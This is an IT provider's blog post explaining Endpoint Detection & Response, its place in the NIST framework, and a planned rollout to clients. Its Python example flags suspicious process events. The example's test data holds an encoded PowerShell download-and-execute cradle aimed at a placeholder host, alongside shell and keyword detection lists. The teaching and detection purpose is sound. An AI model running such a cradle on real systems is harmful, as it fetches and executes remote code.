Introducing Endpoint Detection & Response (EDR)

26.05.23

The Cyber Security landscape is continually evolving, with major attacks, threats and vulnerabilities hitting the news on a regular basis. One only needs to look at the recent supply-chain attack that impacted customers of Business Communications provider 3CX (3CX DesktopApp security issue – NCSC.GOV.UK) as an example of how UK businesses (including SMEs) can be compromised and adversely impacted.

Whilst security solutions such as Anti-Virus and traditional firewalls have served us well for many years (and continue to play a vital role), it has become necessary to bolster defences with the likes of Endpoint Detection & Response (EDR) and Next-Gen Firewall Solutions. In this blog, we’ll explore what EDR is, why it matters to your business and what to expect from Computer Geeks in the future:

What is Endpoint Detection & Response (EDR)?

Endpoint Detection and Response (EDR) is a cybersecurity solution that helps protect your business’s computers and servers from advanced cyber threats. It typically runs as an installed agent (similar to anti-virus) that continuously records what is happening on the device, raises alerts when it sees suspicious activity, and gives whoever is monitoring it the ability to respond directly on the endpoint, for example by isolating the machine from the network, killing a malicious process or quarantining a file, rather than simply blocking a known file.

How does it differ from traditional signature-based anti-virus?

Traditional signature-based antivirus solutions work by comparing files and programs against a database of known malware signatures. If a match is found, the antivirus software blocks or removes the identified threat. However, this approach is limited to detecting known threats and may struggle with new or sophisticated malware that has not been previously identified.

EDR, on the other hand, takes a more proactive and advanced approach to security. It continuously monitors and records endpoint activities, such as file changes, network connections, process execution, and system behaviour. By analysing this data in near real time and using techniques like behavioural analytics and machine learning, EDR can identify suspicious activity and potential breaches even when the malware or tooling involved has never been seen before. The “zero-day” exploit itself may not be recognised, but the behaviour that follows it (an Office document spawning a command shell, a script fetching and running code from the internet, a process tampering with backups) usually is. The caveat is that EDR is not a silver bullet: its detections need tuning to the environment, its alerts need someone to triage them, and attackers actively try to disable or evade agents, which is why it is normally delivered as a managed service rather than a product you install and forget.
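To make the difference between the two approaches concrete, here is a small added example (written for this post; it is not code from any EDR vendor or from Computer Geeks). It runs a signature check and a simple behavioural rule over a few constructed process-creation events of the kind an EDR agent would record. The field names, the “known bad” hash list, the rule names and the sample command lines are all invented for illustration.

```python
"""
Added example: signature matching vs. behavioural detection over constructed
endpoint telemetry. Not any vendor's EDR logic; every value below is made up.
"""
import base64
import hashlib
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    """One process-start event as an EDR agent might record it (constructed)."""
    host: str
    parent: str      # image name of the parent process
    image: str       # image name of the new process
    cmdline: str     # full command line
    sha256: str      # hash of the executed binary


def sha256_of(label: str) -> str:
    """Stand-in for hashing a real binary: hash a label so the example runs offline."""
    return hashlib.sha256(label.encode()).hexdigest()


# Signature database: a hypothetical "known dropper" hash. A repacked sample
# with a different hash, or abuse of a legitimate binary, will not be in here.
KNOWN_BAD_HASHES = {sha256_of("known-dropper-v1")}

# Behavioural rule inputs (hypothetical lists, kept short for the example).
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def signature_detect(ev: ProcessEvent) -> bool:
    """Traditional AV-style check: is the binary's hash on the block list?"""
    return ev.sha256 in KNOWN_BAD_HASHES


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE base64), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand", "-e", "-ec"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def behaviour_detect(ev: ProcessEvent) -> List[str]:
    """EDR-style check: look at what the process is doing, not what it hashes to."""
    findings = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if parent in OFFICE_APPS and image in SHELLS:
        findings.append("office-app-spawned-shell")
    if image == "powershell.exe":
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            findings.append("encoded-powershell")
            if "downloadstring" in decoded.lower() or "iex" in decoded.lower():
                findings.append("download-cradle")
    return findings


def triage(events: List[ProcessEvent]) -> List[dict]:
    """Run both checks over a batch of events and return one verdict per event."""
    return [
        {
            "host": ev.host,
            "image": ev.image,
            "signature_hit": signature_detect(ev),
            "behaviour_hits": behaviour_detect(ev),
        }
        for ev in events
    ]


# Constructed sample telemetry. The encoded command is built here so that it
# really decodes; the URL is a non-routable placeholder.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # Benign: a user opens PowerShell from Explorer.
    ProcessEvent("PC01", "explorer.exe", "powershell.exe", "powershell.exe",
                 sha256_of("powershell-legit")),
    # Known dropper: the hash is on the list, so signature AV catches it.
    ProcessEvent("PC02", "explorer.exe", "invoice.exe", "invoice.exe",
                 sha256_of("known-dropper-v1")),
    # Macro-driven attack using the legitimate PowerShell binary: no hash
    # will ever match, but the parent/child pairing and the payload stand out.
    ProcessEvent("PC03", "WINWORD.EXE", "powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_ENC}",
                 sha256_of("powershell-legit")),
]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_EVENTS):
        print(verdict)
```

The third event is the interesting one: the binary being run is a perfectly legitimate copy of PowerShell, so a hash lookup has nothing to match against, while the behavioural rules flag it three ways. Real EDR products use far richer telemetry and rule sets than this, but the principle is the same.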

What is the NIST framework and where does EDR sit within it?

The NIST Cybersecurity Framework, published by the US National Institute of Standards and Technology, is a widely recognised and respected cybersecurity framework. Although it was developed by the US government, it remains just as relevant to UK businesses. It provides guidelines and best practices for managing and improving an organisation’s cybersecurity risk.

The NIST framework is organised around five core functions:

Identify, Protect, Detect, Respond and Recover

EDR maps primarily to the “Detect” and “Respond” functions, and complements anti-virus, which sits mainly under “Protect”. It plays a crucial role in the detection and response stages of incident management, helping organisations spot and contain security incidents on their endpoints quickly and so limit the damage. It is worth being clear about what it does not cover: the “Identify” and “Recover” functions (knowing what assets you have, keeping tested backups, having a recovery plan) still need to be addressed separately.

How else might EDR benefit my business?

Not only does EDR allow for early detection of cyber threats that traditional anti-virus solutions may miss, it is also one of the controls most commonly asked about on cyber insurance questionnaires. Having EDR in place is likely to be reflected in the premium and cover you are offered when compared with an environment that has not implemented it.

What should I expect from Computer Geeks on EDR?

Computer Geeks will be rolling out EDR to all compatible devices for our Geeks Protect & Geeks Cloud customers from Q3 2023. As part of this change we’ll be transitioning away from Webroot Anti-Virus on Windows devices and instead coupling Managed Windows Defender with our EDR solution. Some devices such as Macs will continue to run Webroot alongside EDR.

We’ll be sending out some more detail on what to expect closer to the time, but we’re really excited to be able to introduce this fantastic technology to our clients at no additional cost.